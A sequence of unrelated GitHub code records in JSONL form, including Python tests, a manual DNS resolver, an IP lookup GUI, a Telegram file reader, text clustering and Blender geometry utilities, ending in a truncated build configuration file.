@patch('repository.git.Repo.clone_from')\n def test_clone_github_repository_invalid_url(self, mock_clone):\n # Test cloning with an invalid repository URL\n mock_clone.side_effect = InvalidGitRepositoryError(\"clone\", \"error\")\n\n with self.assertRaises(RepoNotValidException):\n clone_github_repository(\"invalid_url\", self.destination_dir)\n\n @patch('repository.github.git')\n def test_checkout_to_commit(self, mock_git):\n expected_calls = [call.Repo(), call.Repo(self.destination_dir), call.Repo().git.checkout(self.commit_hash)]\n mock_git.Repo().return_value = Mock()\n\n checkout_to_commit(self.destination_dir, self.commit_hash)\n\n mock_git.assert_has_calls(expected_calls)\n\n @patch('repository.github.git')\n def test_checkout_to_commit_invalid_commit(self, mock_git):\n mock_git.Repo().return_value = Mock()\n mock_git.Repo().git.checkout.side_effect = GitCommandError(\"checkout\", \"error\")\n\n with self.assertRaises(CommitNotValidException):\n checkout_to_commit(self.destination_dir, \"invalid_commit_hash\")\n","repo_name":"jonathansantilli/snyk-report-commit-matcher","sub_path":"tests/repository/test_github.py","file_name":"test_github.py","file_ext":"py","file_size_in_byte":2599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"72446556953","text":"#Biseksi mencari akar\n\nx = float(raw_input('masukkan angka: ')) #pengguna meng-input-kan angka yang akarnya akan dicari\nepsilon = 0.01 #nilai eror yang diinginkan\nbanyaktebakan = 0 #inisialisasi banyaknya tebakan\natas = x #batas atas dari rentang\nbawah = 0.0 #batas bawah dari rentang\nakar = (atas + bawah)/2.0 #nilai tengah dari rentang atau nilai akar kuadrat\nwhile abs(akar**2 - x) >= epsilon: #lakukan algoritma biseksi selama eror lebih besar atau sama dengan nilai epsilon\n print ('bawah = ' + str(bawah) + ' atas = ' + str(atas) + ' akar = ' + str(akar))\n banyaktebakan += 1 #pengitunga jumlah tebakan yang dilakukan\n if akar**2 > x: #pengujian untuk memilih rentang\n atas = akar\n else:\n bawah = akar\n akar = (bawah + atas)/2.0 #nilai akar kuadrat\nprint ('banyak tebakan = ' + str(banyaktebakan))\nprint (str(akar) + ' mendekati akar dari ' + str(x))\n","repo_name":"bagustris/lpthw","sub_path":"biseksi.py","file_name":"biseksi.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"29911547672","text":"from typing import Optional\nfrom aiogram import types\nimport csv\nimport email\nimport os\nimport asyncio\nimport aiogram.types as types\nimport docx\nimport openpyxl\nimport pptx\nimport pypdf\nfrom bs4 import BeautifulSoup\nclass FileTranscript:\n \"\"\"\n The FileTranscript class is responsible for reading and downloading various types of files,\n such as text documents, spreadsheets, presentations, emails, and more.\n \"\"\"\n\n VALID_EXTENSIONS = [\n \"txt\", \"rtf\", \"md\", \"html\", \"xml\", \"csv\", \"json\", \"js\", \"css\", \"py\", \"java\", \"c\",\n \"cpp\", \"php\", \"rb\", \"swift\", \"sql\", \"sh\", \"bat\", \"ps1\", \"ini\", \"cfg\", \"conf\", \"log\",\n \"svg\", \"epub\", \"mobi\", \"tex\", \"docx\", \"odt\", \"xlsx\", \"ods\", \"pptx\", \"odp\", \"eml\",\n \"htaccess\", \"nginx.conf\", \"pdf\"\n ]\n\n async def read_document(self, filename: str) -> str:\n \"\"\"\n Reads the contents of a document file based on its extension.\n\n Args:\n filename (str): The name of the file to read.\n\n Returns:\n str: The contents of the file.\n \"\"\"\n try:\n extension = filename.split(\".\")[-1]\n contents = \"\"\n\n if extension not in self.VALID_EXTENSIONS:\n return \"Invalid document file\"\n\n if extension == \"pdf\":\n with open(filename, \"rb\") as f:\n pdf_reader = pypdf.PdfReader(f)\n num_pages = len(pdf_reader.pages)\n for page_num in range(num_pages):\n page_obj = pdf_reader.pages[page_num]\n page_text = page_obj.extract_text()\n contents += page_text\n\n elif extension == \"docx\":\n doc = docx.Document(filename)\n contents = \"\\n\".join([paragraph.text for paragraph in doc.paragraphs])\n\n elif extension in [\"xlsx\", \"ods\"]:\n workbook = openpyxl.load_workbook(filename, read_only=True)\n sheet = workbook.active\n for row in sheet.iter_rows(values_only=True):\n contents += \"\\t\".join([str(cell_value) for cell_value in row]) + \"\\n\"\n\n elif extension in [\"pptx\", \"odp\"]:\n presentation = pptx.Presentation(filename)\n for slide in presentation.slides:\n for shape in slide.shapes:\n if hasattr(shape, \"text\"):\n contents += shape.text + \"\\n\"\n\n elif extension == \"eml\":\n with open(filename, \"r\") as f:\n msg = email.message_from_file(f)\n for part in msg.walk():\n if part.get_content_type() == \"text/plain\":\n contents += part.get_payload()\n\n elif extension in [\"html\", \"xml\"]:\n with open(filename, \"r\") as f:\n soup = BeautifulSoup(f, \"html.parser\")\n contents = soup.get_text()\n\n elif extension == \"csv\":\n with open(filename, \"r\") as f:\n reader = csv.reader(f)\n for row in reader:\n contents += \"\\t\".join(row) + \"\\n\"\n\n else:\n with open(filename, \"r\") as f:\n contents = f.read()\n\n except Exception as e:\n contents = f\"Error during file download: {str(e)}\"\n\n return contents\n\n async def download_file(self, bot, message: types.Message) -> Optional[str]:\n \"\"\"\n Downloads a file from a Telegram message.\n\n Args:\n bot: The bot instance.\n message (types.Message): The Telegram message containing the file.\n\n Returns:\n Optional[str]: The full file path of the downloaded file, or None if there was an error.\n \"\"\"\n try:\n if message.document is None:\n return None\n\n file = message.document\n file_extension = file.file_name.split(\".\")[-1] if file.file_name else \"\"\n file_path = f\"{file.file_id}.{file_extension}\"\n file_dir = \"downloaded_files\"\n os.makedirs(file_dir, exist_ok=True)\n full_file_path = os.path.join(file_dir, file_path)\n await bot.download(file=file, destination=full_file_path)\n return full_file_path\n\n except Exception as e:\n print(f\"Error during file download: {str(e)}\")\n return None","repo_name":"noes14155/Telegrambot-with-GPT","sub_path":"bot/file_transcript.py","file_name":"file_transcript.py","file_ext":"py","file_size_in_byte":4459,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"5"} +{"seq_id":"7622877386","text":"\"\"\"\nCustomized log configuration\n\"\"\"\nimport inspect\nimport logging\nimport sys\n\n# Originally from https://github.com/hima03/log-decorator.git\n# Modified for my own preferences.\n\n\nclass CustomFormatter(logging.Formatter): # pragma: no cover\n \"\"\"Custom Formatter does these 2 things:\n 1. Overrides 'funcName' with the value of 'func_name_override', if it exists.\n 2. Overrides 'filename' with the value of 'file_name_override', if it exists.\n \"\"\"\n\n def format(self, record) -> str: # pragma: no cover\n if hasattr(record, \"func_name_override\"):\n record.funcName = record.func_name_override\n if hasattr(record, \"file_name_override\"):\n record.filename = record.file_name_override\n if hasattr(record, \"module\"):\n record.module = record.file_name_override.rstrip(\".py\")\n return super(CustomFormatter, self).format(record)\n\n\ndef get_logger() -> logging.Logger: # pragma: no cover\n \"\"\"Customizes and returns a Logger object.\n Set the formatter of 'CustomFormatter' type as we want to log base function name\n and base file name\n \"\"\"\n\n # Create logger object and set the format for logging and other attributes\n logger = logging.Logger(f\"{__package__}.{inspect.stack()[2][3]}\")\n if logger.getEffectiveLevel() != logging.getLogger(__package__).getEffectiveLevel():\n logger.setLevel(logging.getLogger(__package__).getEffectiveLevel())\n\n handler = logging.StreamHandler(stream=sys.stderr)\n\n handler.setFormatter(\n # CustomFormatter(\n # \"%(asctime)s:%(levelname)-10s:%(filename)s:%(funcName)s:%(message)s\"\n # )\n CustomFormatter(\n \"[%(asctime)s] - %(module)s:%(funcName)s - %(levelname)s - %(message)s\"\n )\n )\n logger.addHandler(handler)\n\n # Return logger object\n return logger\n","repo_name":"kronenpj/pinochle","sub_path":"src/pinochle/custom_log.py","file_name":"custom_log.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"72991689432","text":"#this programme used to find out server address of any ip and uses tkinter gui\n#information will be accessed via ip-api.com\nfrom tkinter import*\nimport requests\nfrom requests import get\nimport socket\nimport xml.etree.ElementTree as ET\nfrom tkinter import messagebox\ncount=0\nmyText=None\nroot=None\nresult=None\nget_info=None\ntags=None\nentryBox=None\ntemp_lebel=None\n#button2 was just testing purpose only and no need to use\ndef button2():\n global myText\n global count\n count+=1\n myText.set(count)\ndef addchlbl(root):\n global myText\n myText=StringVar()\n myText.set(\"\")\n myLabel=Label(root,textvariable=myText)\n myLabel.pack()\ndef info(ip_address):\n global get_info\n get_info=requests.request(\"GET\",\"http://ip-api.com/xml/\"+ip_address)\n global tags\n tags=ET.fromstring(get_info.text)\n #messagebox.showinfo(\"incomeing info\",\"information received\")\ndef button_host():\n #global temp_lebel\n myText=\"\"\n ip_address=get(\"http://ipapi.co/ip\")\n ip_address=ip_address.text\n info(ip_address)\n temp_lebel=Label(root,text='\\n'.join(''.join(i.text) for i in tags))\n #temp_lebel=Label(root,text=myText)\n temp_lebel.pack()\n #messagebox.showinfo(\"incomeing info\",'\\n'.join(i.tag.join('').join(i.text) for i in tags))\n '''for i in tags:\n print (i.tag,i.text)'''\ndef button_address():\n global entryBox\n #global temp_lebel\n text=entryBox.get()\n ip_address=socket.gethostbyname(text)\n info(ip_address)\n #temp_lebel=Label(root,text='\\n'.join(''.join(i.text) for i in tags))\n for i in tags:\n temp_lebel=Label(root,text=i.text)\n temp_lebel.pack()\ndef input_box(x):\n global entryBox\n entryBox=Entry(x)\n entryBox.pack()\ndef main():\n root=Tk()\n root.title(\"Server information\")\n w=Label(root,text=\"Input a web address or for finding network info input 'host' without quotes\")\n host_button=Button(root,text=\"Host ip info\",command=button_host)\n address_button=Button(root,text=\"Address info\",command=button_address)\n w.pack()\n host_button.pack()\n w=Label(root,text=\"or\").pack()\n input_box(root)\n address_button.pack()\n addchlbl(root)\n changed_button=Button(root,text=\"click\",command=button2).pack()\n root.mainloop()\nmain()\n","repo_name":"tomal123bd/Programming","sub_path":"Finding_Server_info_GUI.py","file_name":"Finding_Server_info_GUI.py","file_ext":"py","file_size_in_byte":2250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"35080094747","text":"import binascii\nimport socket\nimport sys\nimport time\nimport csv\n\n\n\ndef message_creator(address):\n #Create a udpacket to send\n message = \"\"\n parameters = \"\"\n ID = 43960 #Identifier 16bit\n message += \"{:04x}\".format(ID)\n QR = 0 #QR 0 for querry 1 bit\n parameters += str(QR)\n OPCODE = 0 #4 bit\n parameters += str(OPCODE).zfill(4)\n AA = 0 #1 bit\n parameters += str(AA)\n TC = 0 #1bit\n parameters += str(TC)\n RD = 0 #1 bit\n parameters += str(RD)\n RA = 0 #1 bit\n parameters += str(RA)\n Z = 0 #3bit\n parameters += str(Z).zfill(3)\n RCODE = 0 #4bit\n parameters += str(RCODE).zfill(4)\n values = \"{:04x}\".format(int(parameters, 2))\n message += values\n #All of them are 4 bits\n Qd_count = 1\n message += \"{:04x}\".format(Qd_count)\n An_count = 0\n message += \"{:04x}\".format(An_count)\n Ns_count = 0\n message += \"{:04x}\".format(Ns_count)\n Ar_count = 0\n message += \"{:04x}\".format(Ar_count)\n z =\"{:04x}\".format(Ar_count)\n #Formatting the address\n splitted_address = address.split(\".\")\n for ady in splitted_address:\n length = \"{:02x}\".format(len(ady))\n message +=length\n encoded_part = binascii.hexlify(ady.encode())\n message += encoded_part.decode()\n\n message += \"00\" # Terminating bit for QNAME\n message += \"{:04x}\".format(1)\n QCLASS = 1\n message += \"{:04x}\".format(QCLASS)\n return message\n\ndef http_decoder(data):\n # Parsing the header section\n header_section = binascii.hexlify(data[0:12]).decode(\"utf-8\")\n ID_message = header_section[0:4]\n Flags_message = header_section[4:8]\n Question_number = int(header_section[8:12], 16)\n Answer_RRs = int(header_section[12:16], 16)\n Authority_RRs = int(header_section[16:20], 16)\n Additional_RRs = int(header_section[20:24], 16)\n\n # Query_Section\n query_section = binascii.hexlify(data[12:25]).decode(\"utf-8\")\n z = 12\n while (1):\n if (binascii.hexlify(data[z:z + 1]).decode(\"utf-8\") != \"00\"):\n z += 1\n else:\n break\n z += 5\n looped = 0\n stored_https = list()\n stored_ttl = list()\n stored_time = list()\n # Parsing the Answer Section\n while (1):\n start = time.time()\n answer_section = binascii.hexlify(data[z:z + 16]).decode(\"utf-8\")\n domain_name = answer_section[0:4]\n host_type = answer_section[4:8]\n host_class = answer_section[8:12]\n host_time_leave = answer_section[12:20]\n data_len = answer_section[20:24]\n ip = answer_section[24:32]\n # parse the ip\n ip_parse = \"\"\n ip_i = 0\n while (1):\n y = ip[ip_i:ip_i + 2]\n x = int((y), 16)\n ip_parse += str(x) + \".\"\n ip_i += 2\n if (ip_i + 2 > len(ip)):\n ip_parse = ip_parse[0:int(len(ip_parse)) - 1]\n break\n total_time = time.time() - start #time in seconds\n total_time = total_time * 1000 #time in ms\n stored_https.append(ip_parse)\n stored_ttl.append(int(host_time_leave,16))\n stored_time.append(total_time)\n z += 16\n looped += 1\n if (looped >= Answer_RRs):\n break\n\n\n return stored_https, stored_ttl, stored_time\n\ndef message_decoder(data):\n #Parsing the header section\n header_section = binascii.hexlify(data[0:12]).decode(\"utf-8\")\n ID_message = header_section[0:4]\n Flags_message = header_section[4:8]\n Question_number = int(header_section[8:12], 16)\n Answer_RRs = int(header_section[12:16], 16)\n Authority_RRs = int(header_section[16:20], 16)\n Additional_RRs = int(header_section[20:24], 16)\n\n # Query_Section\n query_section = binascii.hexlify(data[12:25]).decode(\"utf-8\")\n\n # leave question\n z=12\n while(1):\n if (binascii.hexlify(data[z:z+1]).decode(\"utf-8\") != \"00\"):\n z+= 1\n else:\n break\n z+=5\n looped = 0\n\n\n while(1):\n resource_name = binascii.hexlify(data[z:z+2]).decode(\"utf-8\")\n\n server_type = binascii.hexlify(data[z+2:z+4]).decode(\"utf-8\")\n server_class = binascii.hexlify(data[z+4:z+6]).decode(\"utf-8\")\n res_time_leave = int(binascii.hexlify(data[z+8:z+10]).decode(\"utf-8\"),16)\n res_len = int(binascii.hexlify(data[z+10:z+12]),16)\n # res_ip = data[data+24:data+24+res_len]\n z += 12 + res_len\n looped += 1\n if(looped >= Authority_RRs):\n break\n looped = 0\n while(1):\n name_resource = binascii.hexlify(data[z:z+2]).decode(\"utf-8\")\n type_server = binascii.hexlify(data[z+2:z+4]).decode(\"utf-8\")\n type_class = binascii.hexlify(data[z+4:z+6]).decode(\"utf-8\")\n ttl_res = int(binascii.hexlify(data[z+8:z+10]).decode(\"utf-8\"),16)\n len_res = int(binascii.hexlify(data[z+10:z+12]),16)\n z += 12\n #skip AAAAs\n if(type_server == \"001c\"):\n z += len_res\n continue\n res_ip = binascii.hexlify(data[z:z+len_res]).decode(\"utf-8\")\n z += len_res\n if(type_server != \"001c\"):\n break\n if(looped >= Additional_RRs):\n break\n\n ip_parse = \"\"\n ip_i = 0\n while (1):\n y = res_ip[ip_i:ip_i + 2]\n x = int((y), 16)\n ip_parse += str(x) + \".\"\n ip_i += 2\n if (ip_i + 2 > len(res_ip)):\n ip_parse = ip_parse[0:int(len(ip_parse)) - 1]\n break\n\n\n return ip_parse\nRoot_servers = [\"198.41.0.4\", \"199.9.14.201\", \"192.33.4.12\", \"199.7.91.13\", \"192.203.230.10\",\n\"192.5.5.241\",\"192.112.36.4\", \"198.97.190.53\", \"192.36.148.17\", \"192.58.128.30\",\n\"193.0.14.129\", \"199.7.83.42\", \"202.12.27.33\"]\nhost = sys.argv[1]\naddress = host\nmessage = message_creator(address)\nmessage = message.replace(\" \", \"\").replace(\"\\n\", \"\")\nprint(\"Domain: \", host)\nwith socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:\n for i in range(len(Root_servers)):\n start_time = time.time()\n sock.sendto(binascii.unhexlify(message), (Root_servers[i],53))\n sock.settimeout(10)\n try:\n data, _ = sock.recvfrom(4096)\n tld_ip = message_decoder(data)\n total_time = time.time() - start_time # time in seconds\n total_time = total_time * 1000 # convert time to ms\n print(\"Root Ip: \", Root_servers[i])\n print(\"time to root: \", total_time, \" ms\")\n break\n except:\n print(\"timeout\")\n continue\nsock.close()\nwith socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:\n start_time = time.time()\n sock.sendto(binascii.unhexlify(message), (tld_ip,53))\n sock.settimeout(10)\n data, _ = sock.recvfrom(4096)\n aut_ip = message_decoder(data)\n total_time = time.time() - start_time # time in seconds\n total_time = total_time * 1000 # convert time to ms\n print(\"TLD IP: \",tld_ip)\n print(\"time to TLD: \", total_time, \" ms\")\n\nsock.close()\n\n\nwith socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:\n start_time = time.time()\n sock.sendto(binascii.unhexlify(message), (aut_ip,53))\n sock.settimeout(10)\n data, _ = sock.recvfrom(4096)\n http, ttl, times = http_decoder(data)\n total_time = time.time() - start_time # time in seconds\n total_time = total_time * 1000 # convert time to ms\n print(\"aut IP: \",aut_ip)\n print(\"time to aut: \", total_time, \" ms\")\n\n\n\ndef csv_checker(ip):\n with open('partcCaches.csv', 'r+') as f:\n temp_csv = []\n writer = csv.writer(f)\n f.seek(0)\n for row in f:\n csv_row = row.strip('\\n').split(',')\n for x in range(len(csv_row)):\n if (ip == csv_row[1]):\n f.close()\n return True\n return False\n\n# open the file in the write mode\ncsv_list = []\ntry:\n with open('partcCaches.csv', 'r', newline='') as f:\n f.close()\nexcept:\n with open('partcCaches.csv', 'w', newline='') as f:\n f.close()\n\nfor i in range(len(http)):\n temp_list = [host]\n temp_list.append(http[i])\n temp_list.append(ttl[i])\n temp_list.append(time.time())\n csv_list.append(temp_list)\nfor i in range(len(csv_list)):\n flag = 0\n flag = csv_checker(csv_list[i][1])\n if(flag == True):\n continue\n else:\n with open('partcCaches.csv', 'a', newline='') as f:\n write_time = time.time()\n writer = csv.writer(f)\n writer.writerow(csv_list[i])\n f.close()\n\n\nsock.close()\n","repo_name":"ekbostan/Socket-Programming-DNS","sub_path":"DNS-Cache.py","file_name":"DNS-Cache.py","file_ext":"py","file_size_in_byte":8491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"32472239279","text":"from operator import itemgetter\nfrom PIL import Image, ImageTk\nimport json\n\n\nclass ImageHandler:\n def resize_image(self, image):\n # Use the original aspect ratio of the image to resize\n if image.height > 300:\n aspect_ratio = image.width / image.height\n new_width = aspect_ratio * 300\n return image.resize((int(new_width), 300), Image.Resampling.LANCZOS)\n\n if image.width > 500:\n aspect_ratio = image.width / image.height\n new_height = 500 * aspect_ratio\n return image.resize((500, int(new_height)), Image.Resampling.LANCZOS)\n\n return image\n\n def display_image(self):\n\n languageFile = open(\"Image_Viewer/lang/en-GB.json\")\n lang = json.load(languageFile)\n labels = itemgetter(\"labels\")(lang)\n\n try:\n self.name_label.configure(\n text=self.image_files[self.current_image_index])\n new_img = Image.open(\n f\"{self.img_dir}/{self.image_files[self.current_image_index]}\")\n self.current_image = ImageTk.PhotoImage(self.resize_image(new_img))\n self.display.configure(image=self.current_image)\n\n except OSError as e:\n self.name_label.configure(text=e)\n self.current_image = ImageTk.PhotoImage(self.blank_img)\n self.display.configure(image=self.current_image)\n\n except IndexError:\n self.name_label.configure(text=labels[\"no_image\"])\n self.current_image = ImageTk.PhotoImage(self.blank_img)\n self.display.configure(image=self.current_image)\n","repo_name":"cBridges851/tkinter-image-viewer","sub_path":"Image_Viewer/image_handler.py","file_name":"image_handler.py","file_ext":"py","file_size_in_byte":1609,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"25756005986","text":"class Solution:\n def removeDuplicates(self, nums: List[int]) -> int:\n l, r = -1, 0\n visit = defaultdict(bool)\n \n while r < len(nums):\n if not visit[nums[r]]:\n l += 1\n nums[l] = nums[r]\n visit[nums[r]] = True\n r += 1\n \n return l + 1","repo_name":"HaolinZhong/LeetCode","sub_path":"0026-remove-duplicates-from-sorted-array/0026-remove-duplicates-from-sorted-array.py","file_name":"0026-remove-duplicates-from-sorted-array.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"20363376529","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n# @Version: Python 3.11.4\n# @Software: Sublime Text 4\n# @Author: StudentCWZ\n# @Email: StudentCWZ@outlook.com\n# @Date: 2023-01-06 10:08:00\n# @Last Modified by: StudentCWZ\n# @Last Modified time: 2023-01-06 11:29:29\n# @Description: 服务启动文件\n\"\"\"\n\nfrom application import create_app\n\napp = create_app()\n\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"StudentCWZ/pyfly","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"33311753493","text":"from sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.cluster import KMeans\nfrom sklearn.metrics import adjusted_rand_score\n\n\nclass TextMiner(object):\n \"\"\"\n\tGets related words based on a list of texts and the query\n\n\tKMeans normally works with numbers only: we need to have numbers. \n\tTo get numbers, we do a common step known as feature extraction.\n\tThe feature used is TF-IDF, a numerical statistic. \n\tThis statistic uses term frequency and inverse document frequency. \n\tIn short: we use statistics to get to numerical features.\n\n\tThe method TfidfVectorizer() implements the TF-IDF algorithm. \n\tBriefly, the method TfidfVectorizer converts a collection of raw \n\tdocuments to a matrix of TF-IDF features\n\n\tAfter we have numerical features, we initialize the KMeans algorithm \n\twith K=number of documents.\n\tthen print the top words per cluster\n\n\t\"\"\"\n\n def get_cluster_terms(self, query, documents):\n # print(documents)\n prediction_list = []\n vectorizer = TfidfVectorizer(\n stop_words=\"english\"\n ) # converts a collection of raw documents to a matrix of TF-IDF features\n # print(vectorizer)\n X = vectorizer.fit_transform(\n documents\n ) # Learn vocabulary and idf, return term-document matrix.\n # print(X)\n true_k = len(documents)\n print(true_k)\n model = KMeans(n_clusters=true_k, init=\"k-means++\", max_iter=100, n_init=1)\n model.fit(X) # Compute K-Means Clustering\n order_centroids = model.cluster_centers_.argsort()[:, ::-1]\n terms = vectorizer.get_feature_names()\n \"\"\"\n\t\tfor i in range(true_k):\n\t\t\tprint(\"Cluster %d:\" % i),\n\t\t\tfor ind in order_centroids[i, :5]:\n\t\t\t\tprint(' %s' % terms[ind]),\n\t\t\"\"\"\n Y = vectorizer.transform(\n [query]\n ) # Prediction to figure out which cluster the query belongs\n prediction = model.predict(\n Y\n ) # Predict the closest cluster each sample in X belongs to.\n for ind in order_centroids[int(prediction), :8]:\n prediction_list.append(terms[ind])\n return prediction_list\n\n\n\"\"\"\t\t\nprint(TextMiner().get_cluster_terms(\"devices\", [\"This little kitty came to play when I was eating at a restaurant.\",\n\"Merley has the best squooshy kitten belly.\",\n\"Google Translate app is incredible.\",\n\"If you open 100 tab in google you get a smiley face.\",\n\"Best cat photo I've ever taken.\",\n\"Climbing ninja cat.\",\n\"Impressed with google map feedback.\",\n\"Key promoter extension for Google Chrome.\"])) \n\"\"\"\n","repo_name":"rotherfordm/theology-library-search-engine","sub_path":"app/textmining.py","file_name":"textmining.py","file_ext":"py","file_size_in_byte":2549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"13842918846","text":"#!/usr/bin/python3\r\n# copyright (c) 2018- polygoniq xyz s.r.o.\r\n\r\nimport bpy\r\nimport numpy\r\nimport unittest\r\nimport mathutils\r\n\r\n\r\nclass WorldBoundingBox:\r\n \"\"\"Bounding box that operates with world space coordinate system.\r\n\r\n If WorldBoundingBox is extended by object then min_x, max_x,... values are in world space,\r\n not object local space. When object moves after initialization of WorldBoundingBox,\r\n coordinate properties are not recomputed to match new object's position - this class does not\r\n store any reference to initialization objects.\r\n WorldBoundingBox computes boundaries even for instanced collection objects, that's advantage\r\n compared to bound_box property of bpy.types.Object.\r\n \"\"\"\r\n\r\n def extend_by_point(self, point: mathutils.Vector):\r\n self.min_x = min(self.min_x, point.x)\r\n self.max_x = max(self.max_x, point.x)\r\n self.min_y = min(self.min_y, point.y)\r\n self.max_y = max(self.max_y, point.y)\r\n self.min_z = min(self.min_z, point.z)\r\n self.max_z = max(self.max_z, point.z)\r\n\r\n def extend_by_object(self, obj: bpy.types.Object,\r\n parent_collection_matrix: mathutils.Matrix = mathutils.Matrix.Identity(4)):\r\n # matrix_world is matrix relative to object's blend.\r\n # Thus collection objects have offset inside colllection defined by their matrix_world.\r\n # We need to multiply parent_collection_matrix by obj.matrix_world in recursion\r\n # to get matrix relevant to top-most collection world space.\r\n obj_matrix = parent_collection_matrix @ obj.matrix_world\r\n # if object is a collection, it has bounding box ((0,0,0), (0,0,0), ...)\r\n # we need to manually traverse objects from collections and extend main bounding box\r\n # to contain all objects\r\n if obj.instance_type == 'COLLECTION':\r\n collection = obj.instance_collection\r\n for collection_obj in collection.objects:\r\n self.extend_by_object(collection_obj, obj_matrix)\r\n else:\r\n for corner in obj.bound_box:\r\n self.extend_by_point(obj_matrix @ mathutils.Vector(corner))\r\n\r\n def __init__(self, min_x: float = float(\"inf\"), max_x: float = float(\"-inf\"),\r\n min_y: float = float(\"inf\"), max_y: float = float(\"-inf\"),\r\n min_z: float = float(\"inf\"), max_z: float = float(\"-inf\")):\r\n self.min_x = min_x\r\n self.max_x = max_x\r\n self.min_y = min_y\r\n self.max_y = max_y\r\n self.min_z = min_z\r\n self.max_z = max_z\r\n\r\n def get_eccentricity(self):\r\n \"\"\"Returns relative eccentricity in each axis.\r\n \"\"\"\r\n return mathutils.Vector((\r\n (self.max_x - self.min_x) / 2.0,\r\n (self.max_y - self.min_y) / 2.0,\r\n (self.max_z - self.min_z) / 2.0\r\n ))\r\n\r\n def get_center(self):\r\n return mathutils.Vector((self.min_x, self.min_y, self.min_z)) + self.get_eccentricity()\r\n\r\n def __str__(self):\r\n return (\r\n f\"Bounding box \\n\"\r\n f\"X = ({self.min_x}, {self.max_x}) \\n\"\r\n f\"Y = ({self.min_y}, {self.max_y}) \\n\"\r\n f\"Z = ({self.min_z}, {self.max_z})\"\r\n )\r\n\r\n\r\ndef plane_from_points(points):\r\n assert len(points) == 3\r\n p1, p2, p3 = points\r\n\r\n v1 = p3 - p1\r\n v2 = p2 - p1\r\n\r\n normal = numpy.cross(v1, v2)\r\n normal_magnitude = numpy.linalg.norm(normal)\r\n normal /= normal_magnitude\r\n offset = numpy.dot(normal, p3)\r\n centroid = numpy.sum(points, 0) / len(points)\r\n\r\n return (normal, offset, centroid)\r\n\r\n\r\ndef fit_plane_to_points(points):\r\n assert len(points) >= 3\r\n return plane_from_points(points[:3])\r\n\r\n # TODO: This is borked :-(\r\n centroid = numpy.sum(points, 0) / len(points)\r\n centered_points = points - centroid\r\n svd = numpy.linalg.svd(numpy.transpose(centered_points))\r\n plane_normal = svd[0][2]\r\n # now that we have the normal let's fit the centroid to the plane to find the offset\r\n offset = numpy.dot(plane_normal, centroid)\r\n return (plane_normal, offset, centroid)\r\n\r\n\r\nclass PlaneFittingTest(unittest.TestCase):\r\n def test_3pts(self):\r\n # unit plane - (0, 0, 1), 0\r\n normal, offset, _ = fit_plane_to_points([(1, -1, 0), (-1, 0, 0), (0, 1, 0)])\r\n self.assertAlmostEqual(normal[0], 0)\r\n self.assertAlmostEqual(normal[1], 0)\r\n self.assertAlmostEqual(normal[2], 1)\r\n self.assertAlmostEqual(offset, 0)\r\n\r\n normal, offset, _ = fit_plane_to_points([(2, -2, 0), (-1, 0, 0), (0, 1, 0)])\r\n self.assertAlmostEqual(normal[0], 0)\r\n self.assertAlmostEqual(normal[1], 0)\r\n self.assertAlmostEqual(normal[2], 1)\r\n self.assertAlmostEqual(offset, 0)\r\n\r\n # offset unit plane - (0, 0, 1), 1\r\n normal, offset, _ = fit_plane_to_points([(2, -2, 1), (-1, 0, 1), (0, 1, 1)])\r\n self.assertAlmostEqual(normal[0], 0)\r\n self.assertAlmostEqual(normal[1], 0)\r\n self.assertAlmostEqual(normal[2], 1)\r\n self.assertAlmostEqual(offset, 1)\r\n\r\n def test_4pts(self):\r\n # unit plane - (0, 0, 1), 0\r\n normal, offset, _ = fit_plane_to_points([(1, -1, 0), (-1, 0, 0), (0, 1, 0), (1, 1, 0)])\r\n self.assertAlmostEqual(normal[0], 0)\r\n self.assertAlmostEqual(normal[1], 0)\r\n self.assertAlmostEqual(normal[2], 1)\r\n self.assertAlmostEqual(offset, 0)\r\n\r\n # can't fit precisely! unit plane - (0, 0, 1), 0\r\n large = 100000000000\r\n normal, offset, _ = fit_plane_to_points(\r\n [(-large, -large, 0.1), (-large, large, -0.1), (large, -large, 0.1), (large, large, -0.1)])\r\n self.assertAlmostEqual(normal[0], 0)\r\n self.assertAlmostEqual(normal[1], 0)\r\n self.assertAlmostEqual(normal[2], 1)\r\n self.assertAlmostEqual(offset, 0)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n unittest.main()\r\n","repo_name":"andrejtetkic/Speedups","sub_path":"polib/linalg.py","file_name":"linalg.py","file_ext":"py","file_size_in_byte":5904,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"28199185228","text":"import os\n\n# toolchains options\nARCH='arm'\nCPU='TBD'\nCROSS_TOOL='gcc'\n\nif os.getenv('RTT_CC'):\n CROSS_TOOL = os.getenv('RTT_CC')\n\nPLATFORM = 'gcc'\nEXEC_PATH = '/opt/gcc-arm-none-eabi-4_8-2014q1_gri/bin'\n\nif os.getenv('RTT_EXEC_PATH'):\n EXEC_PATH = os.getenv('RTT_EXEC_PATH')\n\nBUILD = 'debug'\n\nif PLATFORM == 'gcc':\n # toolchains\n PREFIX = 'arm-none-eabi-'\n CC = PREFIX + 'gcc'\n AS = PREFIX + 